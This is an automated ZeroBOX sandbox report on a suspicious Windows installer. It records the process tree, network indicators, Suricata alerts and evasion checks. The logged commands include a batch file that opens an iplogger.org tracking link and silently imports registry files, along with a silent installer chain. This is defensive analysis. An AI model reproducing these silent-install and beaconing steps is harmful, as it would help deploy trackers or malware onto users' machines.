Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	June 19, 2021, 6:41 p.m.	June 19, 2021, 6:44 p.m.

Size	1.1MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`5499fd2b9a83a2de834ba2539d2d210d`
SHA256	`9217d926826128058e86a2a2bba020ea38062503648e320194b22d1ade0ffee9`
CRC32	`03960030`
ssdeep	`24576:pAT8QE+kBdI1k1n5hjo2ZQridOHBV8sBdUtjLc02WdK3D4yVWK/Vhl:pAI+m/hjVZe/3BdAj92+WDN3Pl`
Yara	PE_Header_Zero - PE File Signature IsPE32 - (no description)

Setup.exe "C:\Users\test22\AppData\Local\Temp\Setup.exe"
1896
- RunWW.exe "C:\Program Files (x86)\VR\Versium Research\RunWW.exe"
  1756
- BSKbrowser.exe "C:\Program Files (x86)\VR\Versium Research\BSKbrowser.exe"
  1808
  - BSKbrowser.exe "C:\Program Files (x86)\VR\Versium Research\BSKbrowser.exe"
    2776
- Versium.exe "C:\Program Files (x86)\VR\Versium Research\Versium.exe"
  888
  - Versium.tmp "C:\Users\test22\AppData\Local\Temp\is-KD3C2.tmp\Versium.tmp" /SL5="$F0240,138429,56832,C:\Program Files (x86)\VR\Versium Research\Versium.exe"
    1912
    - Setup.exe "C:\Users\test22\AppData\Local\Temp\is-FEBQS.tmp\Setup.exe" /Verysilent
      2216
      - cmd.exe cmd /c ""C:\Program Files (x86)\EverestSoftrade\TonerRecover\log.bat" "
        2852
        
        explorer.exe explorer https://iplogger.org/2qJhq6
        1068
        
        regedit.exe regedit /s adj.reg
        2740
        
        regedit.exe regedit /s adj2.reg
        3088
      - Updater.exe "C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe"
        1408
        
        Updater.exe "C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe"
        3312
      - Toner-Recover.exe "C:\Program Files (x86)\EverestSoftrade\TonerRecover\Toner-Recover.exe"
        872
explorer.exe C:\Windows\Explorer.EXE
1848

Name	Response	Post-Analysis Lookup
ipqualityscore.com	A 104.26.2.60 A 172.67.72.12 A 104.26.3.60	172.67.72.12
api.ip.sb	CNAME api.ip.sb.cdn.cloudflare.net A 104.26.13.31 A 104.26.12.31 A 172.67.75.172	172.67.75.172
iplogger.org	A 88.99.66.31	88.99.66.31
ynabrdosmc.xyz	A 178.57.217.111	178.57.217.111
yaklalau.xyz	A 141.136.0.74	141.136.0.74
ipinfo.io	A 34.117.59.81	34.117.59.81
www.google.com	A 142.250.66.36	172.217.161.36
ssl.gstatic.com	A 142.250.66.99	172.217.31.163
everestsoftrade.com	A 68.65.120.87	68.65.120.87

IP Address	Status	Action
117.18.232.200	Active	Moloch
141.136.0.74	Active	Moloch
142.250.66.36	Active	Moloch
142.250.66.99	Active	Moloch
164.124.101.2	Active	Moloch
172.67.72.12	Active	Moloch
172.67.75.172	Active	Moloch
178.57.217.111	Active	Moloch
34.117.59.81	Active	Moloch
68.65.120.87	Active	Moloch
88.99.66.31	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49212 -> 142.250.66.36:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49206 -> 88.99.66.31:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49207 -> 88.99.66.31:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49220 -> 142.250.66.99:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49210 -> 34.117.59.81:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49210 -> 34.117.59.81:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49243 -> 142.250.66.99:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49236 -> 88.99.66.31:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49214 -> 172.67.72.12:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49247 -> 172.67.75.172:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49209 -> 34.117.59.81:80	2020716	ET POLICY Possible External IP Lookup ipinfo.io	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49240 -> 142.250.66.36:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 34.117.59.81:443 -> 192.168.56.101:49210	2025330	ET POLICY Possible External IP Lookup SSL Cert Observed (ipinfo.io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49244 -> 142.250.66.99:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 68.65.120.87:80 -> 192.168.56.101:49217	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 192.168.56.101:49213 -> 142.250.66.36:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49209 -> 34.117.59.81:80	2020716	ET POLICY Possible External IP Lookup ipinfo.io	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49209 -> 34.117.59.81:80	2020716	ET POLICY Possible External IP Lookup ipinfo.io	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49221 -> 142.250.66.99:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49237 -> 88.99.66.31:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49267 -> 172.67.75.172:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49241 -> 142.250.66.36:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49269 -> 117.18.232.200:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49271 -> 117.18.232.200:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49272 -> 117.18.232.200:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49277 -> 117.18.232.200:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 117.18.232.200:443 -> 192.168.56.101:49279	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 141.136.0.74:80 -> 192.168.56.101:49234	2221010	SURICATA HTTP unable to match response to request	Generic Protocol Command Decode
TCP 192.168.56.101:49270 -> 117.18.232.200:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 117.18.232.200:443 -> 192.168.56.101:49273	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 117.18.232.200:443 -> 192.168.56.101:49274	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 178.57.217.111:80 -> 192.168.56.101:49266	2221010	SURICATA HTTP unable to match response to request	Generic Protocol Command Decode
TCP 192.168.56.101:49278 -> 117.18.232.200:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49212 142.250.66.36:443	C=US, O=Google Trust Services, CN=GTS CA 1O1	C=US, ST=California, L=Mountain View, O=Google LLC, CN=www.google.com	b9:d2:07:58:7d:6a:f8:95:f1:2e:fc:55:e1:2b:c0:aa:31:c0:7b:fc
TLSv1 192.168.56.101:49206 88.99.66.31:443	C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA	CN=*.iplogger.org	55:1e:13:99:46:1c:67:40:a3:48:7f:38:0d:16:e7:51:f4:c4:43:cb
TLSv1 192.168.56.101:49207 88.99.66.31:443	C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA	CN=*.iplogger.org	55:1e:13:99:46:1c:67:40:a3:48:7f:38:0d:16:e7:51:f4:c4:43:cb
TLSv1 192.168.56.101:49220 142.250.66.99:443	C=US, O=Google Trust Services, CN=GTS CA 1O1	C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.gstatic.com	03:b6:7e:a2:fe:f4:cd:71:f5:70:a2:5c:f9:5c:9b:65:cc:f6:df:d4
TLSv1 192.168.56.101:49210 34.117.59.81:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1D4	CN=ipinfo.io	43:26:3d:5a:7e:4a:bc:f7:21:b5:d0:00:f1:49:6c:a5:bf:d1:ff:e7
TLSv1 192.168.56.101:49243 142.250.66.99:443	C=US, O=Google Trust Services, CN=GTS CA 1O1	C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.gstatic.com	03:b6:7e:a2:fe:f4:cd:71:f5:70:a2:5c:f9:5c:9b:65:cc:f6:df:d4
TLSv1 192.168.56.101:49236 88.99.66.31:443	C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA	CN=*.iplogger.org	55:1e:13:99:46:1c:67:40:a3:48:7f:38:0d:16:e7:51:f4:c4:43:cb
TLSv1 192.168.56.101:49214 172.67.72.12:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	f5:72:da:40:bf:be:27:7c:72:0c:5c:e2:dd:f4:22:7a:4d:b1:41:14
TLSv1 192.168.56.101:49247 172.67.75.172:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3	C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	5e:7d:19:2d:d7:66:0c:63:45:a5:24:8f:b7:db:35:a7:61:6d:89:0e
TLSv1 192.168.56.101:49240 142.250.66.36:443	C=US, O=Google Trust Services, CN=GTS CA 1O1	C=US, ST=California, L=Mountain View, O=Google LLC, CN=www.google.com	b9:d2:07:58:7d:6a:f8:95:f1:2e:fc:55:e1:2b:c0:aa:31:c0:7b:fc
TLSv1 192.168.56.101:49244 142.250.66.99:443	C=US, O=Google Trust Services, CN=GTS CA 1O1	C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.gstatic.com	03:b6:7e:a2:fe:f4:cd:71:f5:70:a2:5c:f9:5c:9b:65:cc:f6:df:d4
TLSv1 192.168.56.101:49213 142.250.66.36:443	C=US, O=Google Trust Services, CN=GTS CA 1O1	C=US, ST=California, L=Mountain View, O=Google LLC, CN=www.google.com	b9:d2:07:58:7d:6a:f8:95:f1:2e:fc:55:e1:2b:c0:aa:31:c0:7b:fc
TLSv1 192.168.56.101:49221 142.250.66.99:443	C=US, O=Google Trust Services, CN=GTS CA 1O1	C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.gstatic.com	03:b6:7e:a2:fe:f4:cd:71:f5:70:a2:5c:f9:5c:9b:65:cc:f6:df:d4
TLSv1 192.168.56.101:49237 88.99.66.31:443	C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA	CN=*.iplogger.org	55:1e:13:99:46:1c:67:40:a3:48:7f:38:0d:16:e7:51:f4:c4:43:cb
TLSv1 192.168.56.101:49267 172.67.75.172:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3	C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	5e:7d:19:2d:d7:66:0c:63:45:a5:24:8f:b7:db:35:a7:61:6d:89:0e
TLSv1 192.168.56.101:49241 142.250.66.36:443	C=US, O=Google Trust Services, CN=GTS CA 1O1	C=US, ST=California, L=Mountain View, O=Google LLC, CN=www.google.com	b9:d2:07:58:7d:6a:f8:95:f1:2e:fc:55:e1:2b:c0:aa:31:c0:7b:fc

Queries for the computername (26 events)

Time & API	Arguments	Status	Return
GetComputerNameW June 19, 2021, 6:41 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 19, 2021, 6:41 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 19, 2021, 6:42 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 19, 2021, 6:42 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 19, 2021, 6:42 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 19, 2021, 6:42 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 19, 2021, 6:42 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 19, 2021, 6:42 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 19, 2021, 6:42 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 19, 2021, 6:42 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 19, 2021, 6:42 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 19, 2021, 6:42 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 19, 2021, 6:42 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 19, 2021, 6:42 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 19, 2021, 6:42 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 19, 2021, 6:42 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 19, 2021, 6:42 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 19, 2021, 6:42 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 19, 2021, 6:42 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 19, 2021, 6:42 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 19, 2021, 6:42 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 19, 2021, 6:42 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 19, 2021, 6:42 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 19, 2021, 6:42 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 19, 2021, 6:42 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 19, 2021, 6:42 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (20 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent June 19, 2021, 6:41 p.m.			0	0
IsDebuggerPresent June 19, 2021, 6:41 p.m.			0	0
IsDebuggerPresent June 19, 2021, 6:41 p.m.			0	0
IsDebuggerPresent June 19, 2021, 6:41 p.m.			0	0
IsDebuggerPresent June 19, 2021, 6:42 p.m.			0	0
IsDebuggerPresent June 19, 2021, 6:42 p.m.			0	0
IsDebuggerPresent June 19, 2021, 6:42 p.m.			0	0
IsDebuggerPresent June 19, 2021, 6:42 p.m.			0	0
IsDebuggerPresent June 19, 2021, 6:42 p.m.			0	0
IsDebuggerPresent June 19, 2021, 6:42 p.m.			0	0
IsDebuggerPresent June 19, 2021, 6:42 p.m.			0	0
IsDebuggerPresent June 19, 2021, 6:42 p.m.			0	0
IsDebuggerPresent June 19, 2021, 6:42 p.m.			0	0
IsDebuggerPresent June 19, 2021, 6:42 p.m.			0	0
IsDebuggerPresent June 19, 2021, 6:42 p.m.			0	0
IsDebuggerPresent June 19, 2021, 6:42 p.m.			0	0
IsDebuggerPresent June 19, 2021, 6:42 p.m.			0	0
IsDebuggerPresent June 19, 2021, 6:42 p.m.			0	0
IsDebuggerPresent June 19, 2021, 6:42 p.m.			0	0
IsDebuggerPresent June 19, 2021, 6:42 p.m.			0	0

Command line console output was observed (9 events)

Time & API	Arguments	Status	Return
WriteConsoleW June 19, 2021, 6:42 p.m.	buffer: C:\Program Files (x86)\EverestSoftrade\TonerRecover> console_handle: 0x00000007	1	1
WriteConsoleW June 19, 2021, 6:42 p.m.	buffer: explorer console_handle: 0x00000007	1	1
WriteConsoleW June 19, 2021, 6:42 p.m.	buffer: https://iplogger.org/2qJhq6 console_handle: 0x00000007	1	1
WriteConsoleW June 19, 2021, 6:42 p.m.	buffer: C:\Program Files (x86)\EverestSoftrade\TonerRecover> console_handle: 0x00000007	1	1
WriteConsoleW June 19, 2021, 6:42 p.m.	buffer: regedit console_handle: 0x00000007	1	1
WriteConsoleW June 19, 2021, 6:42 p.m.	buffer: /s adj.reg console_handle: 0x00000007	1	1
WriteConsoleW June 19, 2021, 6:42 p.m.	buffer: C:\Program Files (x86)\EverestSoftrade\TonerRecover> console_handle: 0x00000007	1	1
WriteConsoleW June 19, 2021, 6:42 p.m.	buffer: regedit console_handle: 0x00000007	1	1
WriteConsoleW June 19, 2021, 6:42 p.m.	buffer: /s adj2.reg console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 73 events)

Time & API	Arguments	Status	Return
CryptExportKey June 19, 2021, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00878ff0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 19, 2021, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00878ff0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 19, 2021, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00879030 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 19, 2021, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00918b00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 19, 2021, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00918b00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 19, 2021, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x009189c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 19, 2021, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00561b88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 19, 2021, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00561e48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 19, 2021, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00561e48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 19, 2021, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00630c48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 19, 2021, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00630c48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 19, 2021, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00630c48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 19, 2021, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00630c48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 19, 2021, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00630cc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 19, 2021, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00630cc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 19, 2021, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00630bc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 19, 2021, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00630bc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 19, 2021, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00630bc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 19, 2021, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00630bc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 19, 2021, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00630bc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 19, 2021, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00630bc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 19, 2021, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00630cc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 19, 2021, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00630c48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 19, 2021, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00630c48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 19, 2021, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00630c48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 19, 2021, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00630c88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 19, 2021, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00630c88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 19, 2021, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00630c88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 19, 2021, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00630d48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 19, 2021, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00630d08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 19, 2021, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00630d08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 19, 2021, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00631608 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 19, 2021, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00631608 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 19, 2021, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00630e48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 19, 2021, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00630e48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 19, 2021, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00631b08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 19, 2021, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006317c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 19, 2021, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006314c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 19, 2021, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00631008 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 19, 2021, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00631148 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 19, 2021, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006311c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 19, 2021, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00630d08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 19, 2021, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00630d08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 19, 2021, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00631588 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 19, 2021, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00631588 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 19, 2021, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00630f48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 19, 2021, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00630f48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 19, 2021, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00631588 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 19, 2021, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00630d08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 19, 2021, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00630d08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Tries to locate where the browsers are installed (2 events)

file	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx June 19, 2021, 6:41 p.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (3 events)

section	CODE
section	DATA
section	BSS

The executable uses a known packer (1 event)

packer

BobSoft Mini Delphi -> BoB / BobSoft

One or more processes crashed (50 out of 65562 events)

Time & API	Arguments	Status
__exception__ June 19, 2021, 6:41 p.m.	stacktrace: LocalFlags+0x50 LocalHandle-0xee kernel32+0x831df @ 0x757a31df runww+0x7dedb @ 0x47dedb runww+0x7eee4 @ 0x47eee4 runww+0x4362 @ 0x404362 runww+0x420f @ 0x40420f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1627684 registers.edi: 17367040 registers.eax: 4294967288 registers.ebp: 1627736 registers.edx: 49795 registers.ebx: 0 registers.esi: 0 registers.ecx: 1160	1
__exception__ June 19, 2021, 6:41 p.m.	stacktrace: LocalFlags+0x50 LocalHandle-0xee kernel32+0x831df @ 0x757a31df runww+0x7dedb @ 0x47dedb runww+0x7eee4 @ 0x47eee4 runww+0x4362 @ 0x404362 runww+0x420f @ 0x40420f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1627684 registers.edi: 17367040 registers.eax: 4294967288 registers.ebp: 1627736 registers.edx: 998 registers.ebx: 0 registers.esi: 0 registers.ecx: 1160	1
